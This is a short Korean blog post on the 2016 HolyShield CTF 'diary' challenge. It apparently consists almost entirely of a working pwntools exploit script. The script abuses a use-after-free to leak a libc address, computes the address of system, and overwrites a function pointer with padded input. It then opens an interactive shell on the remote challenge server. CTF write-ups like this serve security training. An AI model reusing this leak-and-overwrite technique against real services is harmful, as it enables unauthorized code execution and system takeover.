2016 holyshield diary

use after free bug문제이다.

대회 때 못풀어서, 학교 셤 끝나고 다시 풀어보았다.

빨리 review문제도 풀어야겠다.

 
from pwn import *
 
local = False
if local :
    s = process('./diary')
    print util.proc.pidof(s)
    pause()
else :
    s = remote('kimtae.xyz', 9989)
 
def command(token, *args) :
    s.recvuntil(token)
    for i in args :
        i = str(i)
        s.sendline(i)
 
fast = lambda  token, *args : command(token, *args)
 
def solver() :
    log.success('login...')
    fast(':', '/bin/sh\x00', '25')
    fast('>', '3')
    fast(':', 'rop payload')
 
    log.success('plan create...')
    fast('>', '1', '2')
    fast(':', 'stitch', '7', '7', 'stitch')
    fast('>', '2')
    fast(':', 'stitch', '7', '7', 'stitch')
 
    log.success('plan free...')
    fast('>', '4', '100')
 
    log.success('addr leak...')
    fast('>', '1')
 
    s.recvuntil('Plan name : ')
    leak = s.recv(6)+'\x00\x00'
 
    target = hex(u64(leak) - 3663848)
    addr = p32(int(target[-8:],16))
    score = int(target[2:6], 16) - 100
 
    log.info('system addr = {0}'.format(target))
 
    log.success('game 1 go...')
    fast('>', '6', '3', '1', '100')
    s.recvuntil('.\n')
    s.sendline('3')
    s.recvuntil('comment\n')
    s.sendline('fuck!')
 
    log.success('game 2 go...')
    fast('>', '1', '-'+str(score))
    s.recvuntil('.\n')
    s.sendline('3')
    fast('>', str(score+100), '3')
    s.recvuntil('comment\n')
    s.sendline('a'*84 + addr)
 
    log.success('get shell !! ')
    fast('>', '3', '1', '1')
 
    s.interactive()
 
if __name__ == '__main__' :
    solver()